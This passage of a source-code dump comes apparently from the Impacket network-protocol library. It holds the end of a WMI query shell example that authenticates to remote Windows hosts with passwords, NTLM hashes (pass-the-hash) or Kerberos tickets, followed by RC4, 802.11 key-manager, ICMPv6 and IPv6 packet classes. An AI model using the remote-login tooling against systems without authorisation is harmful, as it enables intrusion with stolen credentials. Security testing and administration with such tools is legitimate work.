impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5.dcom import wmi\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection, COMVERSION\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY\n\nif __name__ == '__main__':\n import cmd\n\n class WMIQUERY(cmd.Cmd):\n def __init__(self, iWbemServices):\n cmd.Cmd.__init__(self)\n self.iWbemServices = iWbemServices\n self.prompt = 'WQL> '\n self.intro = '[!] Press help for extra shell commands'\n\n def do_help(self, line):\n print(\"\"\"\n lcd {path} - changes the current local directory to {path}\n exit - terminates the server process (and this session)\n describe {class} - describes class\n ! {cmd} - executes a local shell cmd\n \"\"\") \n\n def do_shell(self, s):\n os.system(s)\n\n def do_describe(self, sClass):\n sClass = sClass.strip('\\n')\n if sClass[-1:] == ';':\n sClass = sClass[:-1]\n try:\n iObject, _ = self.iWbemServices.GetObject(sClass)\n iObject.printInformation()\n iObject.RemRelease()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n\n def do_lcd(self, s):\n if s == '':\n print(os.getcwd())\n else:\n os.chdir(s)\n \n def printReply(self, iEnum):\n printHeader = True\n while True:\n try:\n pEnum = iEnum.Next(0xffffffff,1)[0]\n record = pEnum.getProperties()\n if printHeader is True:\n print('|', end=' ')\n for col in record:\n print('%s |' % col, end=' ')\n print()\n printHeader = False\n print('|', end=' ') \n for key in record:\n if type(record[key]['value']) is list:\n for item in record[key]['value']:\n print(item, end=' ')\n print(' |', end=' ')\n else:\n print('%s |' % record[key]['value'], end=' ')\n print() \n except Exception as e:\n if str(e).find('S_FALSE') < 0:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n raise\n else:\n break\n iEnum.RemRelease() \n\n def default(self, line):\n line = line.strip('\\n')\n if line[-1:] == ';':\n line = line[:-1]\n try:\n iEnumWbemClassObject = self.iWbemServices.ExecQuery(line.strip('\\n'))\n self.printReply(iEnumWbemClassObject)\n iEnumWbemClassObject.RemRelease()\n except Exception as e:\n logging.error(str(e))\n \n def emptyline(self):\n pass\n\n def do_exit(self, line):\n return True\n\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Executes WQL queries and gets object descriptions \"\n \"using Windows Management Instrumentation.\")\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-namespace', action='store', default='//./root/cimv2', help='namespace name (default //./root/cimv2)')\n parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the WQL shell')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-com-version', action='store', metavar = \"MAJOR_VERSION:MINOR_VERSION\", help='DCOM version, '\n 'format is MAJOR_VERSION:MINOR_VERSION e.g. 5.7')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-rpc-auth-level', choices=['integrity', 'privacy','default'], nargs='?', default='default',\n help='default, integrity (RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) or privacy '\n '(RPC_C_AUTHN_LEVEL_PKT_PRIVACY). For example CIM path \"root/MSCluster\" would require '\n 'privacy level by default)')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n \n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.com_version is not None:\n try:\n major_version, minor_version = options.com_version.split('.')\n COMVERSION.set_default_version(int(major_version), int(minor_version))\n except Exception:\n logging.error(\"Wrong COMVERSION format, use dot separated integers e.g. \\\"5.7\\\"\")\n sys.exit(1)\n\n domain, username, password, address = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n if options.hashes is not None:\n lmhash, nthash = options.hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n\n try:\n dcom = DCOMConnection(address, username, password, domain, lmhash, nthash, options.aesKey, oxidResolver=True,\n doKerberos=options.k, kdcHost=options.dc_ip)\n\n iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)\n iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)\n iWbemServices= iWbemLevel1Login.NTLMLogin(options.namespace, NULL, NULL)\n if options.rpc_auth_level == 'privacy':\n iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n elif options.rpc_auth_level == 'integrity':\n iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)\n\n iWbemLevel1Login.RemRelease()\n\n shell = WMIQUERY(iWbemServices)\n if options.file is None:\n shell.cmdloop()\n else:\n for line in options.file.readlines():\n print(\"WQL> %s\" % line, end=' ')\n shell.onecmd(line)\n\n iWbemServices.RemRelease()\n dcom.disconnect()\n except Exception as e:\n logging.error(str(e))\n try:\n dcom.disconnect()\n except:\n pass\n" }, { "path": "impacket/Dot11Crypto.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# IEEE 802.11 Network packet codecs.\n#\n# Author:\n# Gustavo Moreira\n#\n\nclass RC4():\n def __init__(self, key):\n bkey = bytearray(key)\n j = 0\n self.state = bytearray(range(256))\n for i in range(256):\n j = (j + self.state[i] + bkey[i % len(key)]) & 0xff\n self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j)\n\n def encrypt(self, data):\n i = j = 0\n out=bytearray()\n for char in bytearray(data):\n i = (i+1) & 0xff\n j = (j+self.state[i]) & 0xff\n self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j)\n out.append(char ^ self.state[(self.state[i] + self.state[j]) & 0xff])\n \n return bytes(out)\n \n def decrypt(self, data):\n # It's symmetric\n return self.encrypt(data)\n" }, { "path": "impacket/Dot11KeyManager.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# IEEE 802.11 Network packet codecs.\n#\n# Author:\n# Gustavo Moreira\n\nfrom array import array\nclass KeyManager:\n def __init__(self):\n self.keys = {}\n \n def __get_bssid_hasheable_type(self, bssid):\n # List is an unhashable type\n if not isinstance(bssid, (list,tuple,array)):\n raise Exception('BSSID datatype must be a tuple, list or array')\n return tuple(bssid) \n\n def add_key(self, bssid, key):\n bssid=self.__get_bssid_hasheable_type(bssid)\n if bssid not in self.keys:\n self.keys[bssid] = key\n return True\n else:\n return False\n \n def replace_key(self, bssid, key):\n bssid=self.__get_bssid_hasheable_type(bssid)\n self.keys[bssid] = key\n \n return True\n \n def get_key(self, bssid):\n bssid=self.__get_bssid_hasheable_type(bssid)\n if bssid in self.keys:\n return self.keys[bssid]\n else:\n return False\n \n def delete_key(self, bssid):\n bssid=self.__get_bssid_hasheable_type(bssid)\n if not isinstance(bssid, list):\n raise Exception('BSSID datatype must be a list')\n \n if bssid in self.keys:\n del self.keys[bssid] \n return True\n \n return False\n" }, { "path": "impacket/ICMP6.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n\nimport array\nimport struct\n\nfrom impacket.ImpactPacket import Header, Data, array_tobytes\nfrom impacket.IP6_Address import IP6_Address\n\n\nclass ICMP6(Header): \n #IP Protocol number for ICMP6\n IP_PROTOCOL_NUMBER = 58\n protocol = IP_PROTOCOL_NUMBER #ImpactDecoder uses the constant \"protocol\" as the IP Protocol Number\n \n #Size of ICMP6 header (excluding payload)\n HEADER_SIZE = 4\n\n #ICMP6 Message Type numbers\n DESTINATION_UNREACHABLE = 1\n PACKET_TOO_BIG = 2\n TIME_EXCEEDED = 3\n PARAMETER_PROBLEM = 4 \n ECHO_REQUEST = 128\n ECHO_REPLY = 129\n ROUTER_SOLICITATION = 133\n ROUTER_ADVERTISEMENT = 134\n NEIGHBOR_SOLICITATION = 135\n NEIGHBOR_ADVERTISEMENT = 136\n REDIRECT_MESSAGE = 137\n NODE_INFORMATION_QUERY = 139\n NODE_INFORMATION_REPLY = 140\n \n #Destination Unreachable codes\n NO_ROUTE_TO_DESTINATION = 0\n ADMINISTRATIVELY_PROHIBITED = 1\n BEYOND_SCOPE_OF_SOURCE_ADDRESS = 2\n ADDRESS_UNREACHABLE = 3\n PORT_UNREACHABLE = 4\n SOURCE_ADDRESS_FAILED_INGRESS_EGRESS_POLICY = 5\n REJECT_ROUTE_TO_DESTINATION = 6\n \n #Time Exceeded codes\n HOP_LIMIT_EXCEEDED_IN_TRANSIT = 0\n FRAGMENT_REASSEMBLY_TIME_EXCEEDED = 1\n \n #Parameter problem codes\n ERRONEOUS_HEADER_FIELD_ENCOUNTERED = 0\n UNRECOGNIZED_NEXT_HEADER_TYPE_ENCOUNTERED = 1\n UNRECOGNIZED_IPV6_OPTION_ENCOUNTERED = 2\n \n #Node Information codes\n NODE_INFORMATION_QUERY_IPV6 = 0\n NODE_INFORMATION_QUERY_NAME_OR_EMPTY = 1\n NODE_INFORMATION_QUERY_IPV4 = 2\n NODE_INFORMATION_REPLY_SUCCESS = 0\n NODE_INFORMATION_REPLY_REFUSED = 1\n NODE_INFORMATION_REPLY_UNKNOWN_QTYPE = 2\n \n #Node Information qtypes\n NODE_INFORMATION_QTYPE_NOOP = 0\n NODE_INFORMATION_QTYPE_UNUSED = 1\n NODE_INFORMATION_QTYPE_NODENAME = 2\n NODE_INFORMATION_QTYPE_NODEADDRS = 3\n NODE_INFORMATION_QTYPE_IPv4ADDRS = 4\n \n #ICMP Message semantic types (error or informational) \n ERROR_MESSAGE = 0\n INFORMATIONAL_MESSAGE = 1\n \n #ICMP message dictionary - specifying text descriptions and valid message codes\n #Key: ICMP message number\n #Data: Tuple ( Message Type (error/informational), Text description, Codes dictionary (can be None) )\n #Codes dictionary\n #Key: Code number\n #Data: Text description\n \n #ICMP message dictionary tuple indexes\n MSG_TYPE_INDEX = 0\n DESCRIPTION_INDEX = 1\n CODES_INDEX = 2\n\n icmp_messages = {\n DESTINATION_UNREACHABLE : (ERROR_MESSAGE, \"Destination unreachable\",\n { NO_ROUTE_TO_DESTINATION : \"No route to destination\",\n ADMINISTRATIVELY_PROHIBITED : \"Administratively prohibited\",\n BEYOND_SCOPE_OF_SOURCE_ADDRESS : \"Beyond scope of source address\",\n ADDRESS_UNREACHABLE : \"Address unreachable\",\n PORT_UNREACHABLE : \"Port unreachable\",\n SOURCE_ADDRESS_FAILED_INGRESS_EGRESS_POLICY : \"Source address failed ingress/egress policy\",\n REJECT_ROUTE_TO_DESTINATION : \"Reject route to destination\"\n }),\n PACKET_TOO_BIG : (ERROR_MESSAGE, \"Packet too big\", None),\n TIME_EXCEEDED : (ERROR_MESSAGE, \"Time exceeded\",\n {HOP_LIMIT_EXCEEDED_IN_TRANSIT : \"Hop limit exceeded in transit\",\n FRAGMENT_REASSEMBLY_TIME_EXCEEDED : \"Fragment reassembly time exceeded\" \n }),\n PARAMETER_PROBLEM : (ERROR_MESSAGE, \"Parameter problem\",\n {\n ERRONEOUS_HEADER_FIELD_ENCOUNTERED : \"Erroneous header field encountered\",\n UNRECOGNIZED_NEXT_HEADER_TYPE_ENCOUNTERED : \"Unrecognized Next Header type encountered\",\n UNRECOGNIZED_IPV6_OPTION_ENCOUNTERED : \"Unrecognized IPv6 Option Encountered\"\n }),\n ECHO_REQUEST : (INFORMATIONAL_MESSAGE, \"Echo request\", None),\n ECHO_REPLY : (INFORMATIONAL_MESSAGE, \"Echo reply\", None),\n ROUTER_SOLICITATION : (INFORMATIONAL_MESSAGE, \"Router Solicitation\", None),\n ROUTER_ADVERTISEMENT : (INFORMATIONAL_MESSAGE, \"Router Advertisement\", None),\n NEIGHBOR_SOLICITATION : (INFORMATIONAL_MESSAGE, \"Neighbor Solicitation\", None),\n NEIGHBOR_ADVERTISEMENT : (INFORMATIONAL_MESSAGE, \"Neighbor Advertisement\", None),\n REDIRECT_MESSAGE : (INFORMATIONAL_MESSAGE, \"Redirect Message\", None),\n NODE_INFORMATION_QUERY: (INFORMATIONAL_MESSAGE, \"Node Information Query\", None),\n NODE_INFORMATION_REPLY: (INFORMATIONAL_MESSAGE, \"Node Information Reply\", None),\n } \n \n \n \n \n############################################################################\n def __init__(self, buffer = None):\n Header.__init__(self, self.HEADER_SIZE)\n if (buffer):\n self.load_header(buffer)\n \n def get_header_size(self):\n return self.HEADER_SIZE\n \n def get_ip_protocol_number(self):\n return self.IP_PROTOCOL_NUMBER\n\n def __str__(self): \n type = self.get_type()\n code = self.get_code()\n checksum = self.get_checksum()\n\n s = \"ICMP6 - Type: \" + str(type) + \" - \" + self.__get_message_description() + \"\\n\"\n s += \"Code: \" + str(code)\n if (self.__get_code_description() != \"\"):\n s += \" - \" + self.__get_code_description()\n s += \"\\n\"\n s += \"Checksum: \" + str(checksum) + \"\\n\"\n return s\n \n def __get_message_description(self):\n return self.icmp_messages[self.get_type()][self.DESCRIPTION_INDEX]\n \n def __get_code_description(self):\n code_dictionary = self.icmp_messages[self.get_type()][self.CODES_INDEX]\n if (code_dictionary is None):\n return \"\"\n else:\n return code_dictionary[self.get_code()]\n \n############################################################################\n def get_type(self): \n return (self.get_byte(0))\n \n def get_code(self):\n return (self.get_byte(1))\n \n def get_checksum(self):\n return (self.get_word(2))\n \n############################################################################\n def set_type(self, type):\n self.set_byte(0, type)\n \n def set_code(self, code):\n self.set_byte(1, code)\n \n def set_checksum(self, checksum):\n self.set_word(2, checksum)\n \n############################################################################\n def calculate_checksum(self): \n #Initialize the checksum value to 0 to yield a correct calculation\n self.set_checksum(0) \n #Fetch the pseudo header from the IP6 parent packet\n pseudo_header = self.parent().get_pseudo_header()\n #Fetch the ICMP data\n icmp_header = self.get_bytes()\n #Build an array of bytes concatenating the pseudo_header, the ICMP header and the ICMP data (if present)\n checksum_array = array.array('B')\n checksum_array.extend(pseudo_header)\n checksum_array.extend(icmp_header)\n if (self.child()):\n checksum_array.extend(self.child().get_bytes())\n \n #Compute the checksum over that array\n self.set_checksum(self.compute_checksum(checksum_array))\n \n def is_informational_message(self):\n return self.icmp_messages[self.get_type()][self.MSG_TYPE_INDEX] == self.INFORMATIONAL_MESSAGE\n \n def is_error_message(self):\n return self.icmp_messages[self.get_type()][self.MSG_TYPE_INDEX] == self.ERROR_MESSAGE\n \n def is_well_formed(self):\n well_formed = True\n \n #Check that the message type is known\n well_formed &= self.get_type() in self.icmp_messages.keys()\n \n #Check that the code is known (zero, if there are no codes defined)\n code_dictionary = self.icmp_messages[self.get_type()][self.CODES_INDEX]\n if (code_dictionary is None):\n well_formed &= self.get_code() == 0\n else: \n well_formed &= self.get_code() in code_dictionary.keys()\n \n return well_formed \n \n############################################################################\n\n @classmethod\n def Echo_Request(class_object, id, sequence_number, arbitrary_data = None):\n return class_object.__build_echo_message(ICMP6.ECHO_REQUEST, id, sequence_number, arbitrary_data)\n \n @classmethod\n def Echo_Reply(class_object, id, sequence_number, arbitrary_data = None):\n return class_object.__build_echo_message(ICMP6.ECHO_REPLY, id, sequence_number, arbitrary_data)\n \n @classmethod\n def __build_echo_message(class_object, type, id, sequence_number, arbitrary_data):\n #Build ICMP6 header\n icmp_packet = ICMP6()\n icmp_packet.set_type(type)\n icmp_packet.set_code(0)\n \n #Pack ICMP payload\n icmp_bytes = struct.pack('>H', id)\n icmp_bytes += struct.pack('>H', sequence_number)\n if (arbitrary_data is not None):\n icmp_bytes += array_tobytes(array.array('B', arbitrary_data))\n icmp_payload = Data()\n icmp_payload.set_data(icmp_bytes)\n \n #Link payload to header\n icmp_packet.contains(icmp_payload)\n \n return icmp_packet\n \n \n############################################################################\n @classmethod\n def Destination_Unreachable(class_object, code, originating_packet_data = None):\n unused_bytes = [0x00, 0x00, 0x00, 0x00]\n return class_object.__build_error_message(ICMP6.DESTINATION_UNREACHABLE, code, unused_bytes, originating_packet_data)\n\n @classmethod\n def Packet_Too_Big(class_object, MTU, originating_packet_data = None):\n MTU_bytes = struct.pack('!L', MTU)\n return class_object.__build_error_message(ICMP6.PACKET_TOO_BIG, 0, MTU_bytes, originating_packet_data)\n \n @classmethod\n def Time_Exceeded(class_object, code, originating_packet_data = None):\n unused_bytes = [0x00, 0x00, 0x00, 0x00]\n return class_object.__build_error_message(ICMP6.TIME_EXCEEDED, code, unused_bytes, originating_packet_data)\n\n @classmethod\n def Parameter_Problem(class_object, code, pointer, originating_packet_data = None):\n pointer_bytes = struct.pack('!L', pointer)\n return class_object.__build_error_message(ICMP6.PARAMETER_PROBLEM, code, pointer_bytes, originating_packet_data)\n \n @classmethod \n def __build_error_message(class_object, type, code, data, originating_packet_data):\n #Build ICMP6 header\n icmp_packet = ICMP6()\n icmp_packet.set_type(type)\n icmp_packet.set_code(code)\n \n #Pack ICMP payload\n icmp_bytes = array_tobytes(array.array('B', data))\n if (originating_packet_data is not None):\n icmp_bytes += array_tobytes(array.array('B', originating_packet_data))\n icmp_payload = Data()\n icmp_payload.set_data(icmp_bytes)\n \n #Link payload to header\n icmp_packet.contains(icmp_payload)\n \n return icmp_packet\n\n############################################################################\n\n @classmethod\n def Neighbor_Solicitation(class_object, target_address):\n return class_object.__build_neighbor_message(ICMP6.NEIGHBOR_SOLICITATION, target_address)\n \n @classmethod\n def Neighbor_Advertisement(class_object, target_address):\n return class_object.__build_neighbor_message(ICMP6.NEIGHBOR_ADVERTISEMENT, target_address)\n\n @classmethod\n def __build_neighbor_message(class_object, msg_type, target_address):\n #Build ICMP6 header\n icmp_packet = ICMP6()\n icmp_packet.set_type(msg_type)\n icmp_packet.set_code(0)\n \n # Flags + Reserved\n icmp_bytes = array_tobytes(array.array('B', [0x00] * 4))\n \n # Target Address: The IP address of the target of the solicitation.\n # It MUST NOT be a multicast address.\n icmp_bytes += array_tobytes(array.array('B', IP6_Address(target_address).as_bytes()))\n \n icmp_payload = Data()\n icmp_payload.set_data(icmp_bytes)\n \n #Link payload to header\n icmp_packet.contains(icmp_payload)\n \n return icmp_packet\n\n############################################################################\n\n def get_target_address(self):\n return IP6_Address(self.child().get_bytes()[4:20])\n\n def set_target_address(self, target_address):\n address = IP6_Address(target_address)\n payload_bytes = self.child().get_bytes()\n payload_bytes[4:20] = address.get_bytes()\n self.child().set_bytes(payload_bytes)\n\n # 0 1 2 3 4 5 6 7 \n # +-+-+-+-+-+-+-+-+\n # |R|S|O|reserved |\n # +-+-+-+-+-+-+-+-+\n\n def get_neighbor_advertisement_flags(self):\n return self.child().get_byte(0)\n\n def set_neighbor_advertisement_flags(self, flags):\n self.child().set_byte(0, flags)\n\n def get_router_flag(self):\n return (self.get_neighbor_advertisement_flags() & 0x80) != 0\n \n def set_router_flag(self, flag_value):\n curr_flags = self.get_neighbor_advertisement_flags()\n if flag_value:\n curr_flags |= 0x80\n else:\n curr_flags &= ~0x80\n self.set_neighbor_advertisement_flags(curr_flags)\n \n def get_solicited_flag(self):\n return (self.get_neighbor_advertisement_flags() & 0x40) != 0\n \n def set_solicited_flag(self, flag_value):\n curr_flags = self.get_neighbor_advertisement_flags()\n if flag_value:\n curr_flags |= 0x40\n else:\n curr_flags &= ~0x40\n self.set_neighbor_advertisement_flags(curr_flags)\n \n def get_override_flag(self):\n return (self.get_neighbor_advertisement_flags() & 0x20) != 0\n \n def set_override_flag(self, flag_value):\n curr_flags = self.get_neighbor_advertisement_flags()\n if flag_value:\n curr_flags |= 0x20\n else:\n curr_flags &= ~0x20\n self.set_neighbor_advertisement_flags(curr_flags)\n\n############################################################################\n @classmethod\n def Node_Information_Query(class_object, code, payload = None):\n return class_object.__build_node_information_message(ICMP6.NODE_INFORMATION_QUERY, code, payload)\n\n @classmethod\n def Node_Information_Reply(class_object, code, payload = None):\n return class_object.__build_node_information_message(ICMP6.NODE_INFORMATION_REPLY, code, payload)\n \n @classmethod\n def __build_node_information_message(class_object, type, code, payload = None):\n #Build ICMP6 header\n icmp_packet = ICMP6()\n icmp_packet.set_type(type)\n icmp_packet.set_code(code)\n \n #Pack ICMP payload\n qtype = 0\n flags = 0\n nonce = [0x00] * 8\n \n icmp_bytes = struct.pack('>H', qtype)\n icmp_bytes += struct.pack('>H', flags)\n icmp_bytes += array_tobytes(array.array('B', nonce))\n \n if payload is not None:\n icmp_bytes += array_tobytes(array.array('B', payload))\n \n icmp_payload = Data()\n icmp_payload.set_data(icmp_bytes)\n \n #Link payload to header\n icmp_packet.contains(icmp_payload)\n\n return icmp_packet\n \n def get_qtype(self):\n return self.child().get_word(0)\n\n def set_qtype(self, qtype):\n self.child().set_word(0, qtype)\n\n def get_nonce(self):\n return self.child().get_bytes()[4:12]\n\n def set_nonce(self, nonce):\n payload_bytes = self.child().get_bytes()\n payload_bytes[4:12] = array.array('B', nonce)\n self.child().set_bytes(payload_bytes)\n\n # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5\n # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n # | unused |G|S|L|C|A|T|\n # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n def get_flags(self):\n return self.child().get_word(2)\n\n def set_flags(self, flags):\n self.child().set_word(2, flags)\n\n def get_flag_T(self):\n return (self.get_flags() & 0x0001) != 0\n \n def set_flag_T(self, flag_value):\n curr_flags = self.get_flags()\n if flag_value:\n curr_flags |= 0x0001\n else:\n curr_flags &= ~0x0001\n self.set_flags(curr_flags)\n \n def get_flag_A(self):\n return (self.get_flags() & 0x0002) != 0\n \n def set_flag_A(self, flag_value):\n curr_flags = self.get_flags()\n if flag_value:\n curr_flags |= 0x0002\n else:\n curr_flags &= ~0x0002\n self.set_flags(curr_flags)\n\n def get_flag_C(self):\n return (self.get_flags() & 0x0004) != 0\n \n def set_flag_C(self, flag_value):\n curr_flags = self.get_flags()\n if flag_value:\n curr_flags |= 0x0004\n else:\n curr_flags &= ~0x0004\n self.set_flags(curr_flags)\n\n def get_flag_L(self):\n return (self.get_flags() & 0x0008) != 0\n \n def set_flag_L(self, flag_value):\n curr_flags = self.get_flags()\n if flag_value:\n curr_flags |= 0x0008\n else:\n curr_flags &= ~0x0008\n self.set_flags(curr_flags)\n\n def get_flag_S(self):\n return (self.get_flags() & 0x0010) != 0\n \n def set_flag_S(self, flag_value):\n curr_flags = self.get_flags()\n if flag_value:\n curr_flags |= 0x0010\n else:\n curr_flags &= ~0x0010\n self.set_flags(curr_flags)\n\n def get_flag_G(self):\n return (self.get_flags() & 0x0020) != 0\n \n def set_flag_G(self, flag_value):\n curr_flags = self.get_flags()\n if flag_value:\n curr_flags |= 0x0020\n else:\n curr_flags &= ~0x0020\n self.set_flags(curr_flags)\n\n def set_node_information_data(self, data):\n payload_bytes = self.child().get_bytes()\n payload_bytes[12:] = array.array('B', data)\n self.child().set_bytes(payload_bytes)\n\n def get_note_information_data(self):\n return self.child().get_bytes()[12:]\n\n############################################################################\n def get_echo_id(self):\n return self.child().get_word(0)\n \n def get_echo_sequence_number(self):\n return self.child().get_word(2)\n \n def get_echo_arbitrary_data(self):\n return self.child().get_bytes()[4:]\n \n def get_mtu(self):\n return self.child().get_long(0)\n \n def get_parm_problem_pointer(self):\n return self.child().get_long(0)\n \n def get_originating_packet_data(self):\n return self.child().get_bytes()[4:]\n" }, { "path": "impacket/IP6.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n\nimport struct\nimport array\n\nfrom impacket.ImpactPacket import Header, array_frombytes\nfrom impacket.IP6_Address import IP6_Address\nfrom impacket.IP6_Extension_Headers import IP6_Extension_Header\n\nfrom impacket import LOG\n\n\nclass IP6(Header):\n #Ethertype value for IPv6\n ethertype = 0x86DD\n HEADER_SIZE = 40\n IP_PROTOCOL_VERSION = 6\n \n def __init__(self, buffer = None):\n Header.__init__(self, IP6.HEADER_SIZE)\n self.set_ip_v(IP6.IP_PROTOCOL_VERSION)\n if (buffer):\n self.load_header(buffer)\n\n def contains(self, aHeader):\n Header.contains(self, aHeader)\n if isinstance(aHeader, IP6_Extension_Header):\n self.set_next_header(aHeader.get_header_type())\n\n def get_header_size(self):\n return IP6.HEADER_SIZE\n\n def __str__(self): \n protocol_version = self.get_ip_v()\n traffic_class = self.get_traffic_class()\n flow_label = self.get_flow_label()\n payload_length = self.get_payload_length()\n next_header = self.get_next_header()\n hop_limit = self.get_hop_limit()\n source_address = self.get_ip_src()\n destination_address = self.get_ip_dst()\n\n s = \"Protocol version: \" + str(protocol_version) + \"\\n\"\n s += \"Traffic class: \" + str(traffic_class) + \"\\n\"\n s += \"Flow label: \" + str(flow_label) + \"\\n\"\n s += \"Payload length: \" + str(payload_length) + \"\\n\"\n s += \"Next header: \" + str(next_header) + \"\\n\"\n s += \"Hop limit: \" + str(hop_limit) + \"\\n\"\n s += \"Source address: \" + source_address.as_string() + \"\\n\"\n s += \"Destination address: \" + destination_address.as_string() + \"\\n\"\n return s\n \n def get_pseudo_header(self):\n source_address = self.get_ip_src().as_bytes()\n #FIXME - Handle Routing header special case\n destination_address = self.get_ip_dst().as_bytes()\n reserved_bytes = [ 0x00, 0x00, 0x00 ]\n\n upper_layer_packet_length = self.get_payload_length()\n upper_layer_protocol_number = self.get_next_header()\n \n next_header = self.child()\n while isinstance(next_header, IP6_Extension_Header):\n # The length used in the pseudo-header is the Payload Length from the IPv6 header, minus\n # the length of any extension headers present between the IPv6 header and the upper-layer header\n upper_layer_packet_length -= next_header.get_header_size()\n \n # If there are extension headers, fetch the correct upper-player protocol number by traversing the list\n upper_layer_protocol_number = next_header.get_next_header()\n \n next_header = next_header.child()\n \n pseudo_header = array.array('B') \n pseudo_header.extend(source_address)\n pseudo_header.extend(destination_address)\n array_frombytes(pseudo_header, struct.pack('!L', upper_layer_packet_length))\n pseudo_header.fromlist(reserved_bytes)\n array_frombytes(pseudo_header, struct.pack('B', upper_layer_protocol_number))\n return pseudo_header\n \n############################################################################\n def get_ip_v(self):\n return (self.get_byte(0) & 0xF0) >> 4\n\n def get_traffic_class(self):\n return ((self.get_byte(0) & 0x0F) << 4) | ((self.get_byte(1) & 0xF0) >> 4)\n\n def get_flow_label(self):\n return (self.get_byte(1) & 0x0F) << 16 | (self.get_byte(2) << 8) | self.get_byte(3)\n\n def get_payload_length(self):\n return (self.get_byte(4) << 8) | self.get_byte(5)\n\n def get_next_header(self):\n return (self.get_byte(6))\n\n def get_hop_limit(self):\n return (self.get_byte(7))\n\n def get_ip_src(self):\n address = IP6_Address(self.get_bytes()[8:24])\n return (address) \n\n def get_ip_dst(self):\n address = IP6_Address(self.get_bytes()[24:40])\n return (address) \n\n############################################################################\n def set_ip_v(self, version):\n if (version != 6):\n raise Exception('set_ip_v - version != 6')\n \n #Fetch byte, clear high nibble\n b = self.get_byte(0) & 0x0F\n #Store version number in high nibble\n b |= (version << 4)\n #Store byte in buffer\n #This behaviour is repeated in the rest of the methods \n self.set_byte(0, b)\n\n\n def set_traffic_class(self, traffic_class):\n b0 = self.get_byte(0) & 0xF0\n b1 = self.get_byte(1) & 0x0F\n b0 |= (traffic_class & 0xF0) >> 4\n b1 |= (traffic_class & 0x0F) << 4\n self.set_byte(0, b0)\n self.set_byte(1, b1)\n \n\n def set_flow_label(self, flow_label):\n b1 = self.get_byte(1) & 0xF0\n b1 |= (flow_label & 0xF0000) >> 16\n self.set_byte(1, b1)\n self.set_byte(2, (flow_label & 0x0FF00) >> 8)\n self.set_byte(3, (flow_label & 0x000FF))\n \n\n def set_payload_length(self, payload_length):\n self.set_byte(4, (payload_length & 0xFF00) >> 8)\n self.set_byte(5, (payload_length & 0x00FF))\n \n\n def set_next_header(self, next_header):\n self.set_byte(6, next_header)\n \n def set_hop_limit(self, hop_limit):\n self.set_byte(7, hop_limit)\n \n def set_ip_src(self, source_address):\n address = IP6_Address(source_address)\n bytes = self.get_bytes()\n bytes[8:24] = address.as_bytes()\n self.set_bytes(bytes)\n\n def set_ip_dst(self, destination_address):\n address = IP6_Address(destination_address)\n bytes = self.get_bytes()\n bytes[24:40] = address.as_bytes()\n self.set_bytes(bytes)\n \n def get_protocol_version(self):\n LOG.warning('deprecated soon')\n return self.get_ip_v() \n \n def get_source_address(self):\n LOG.warning('deprecated soon')\n return self.get_ip_src()\n \n def get_destination_address(self):\n LOG.warning('deprecated soon')\n 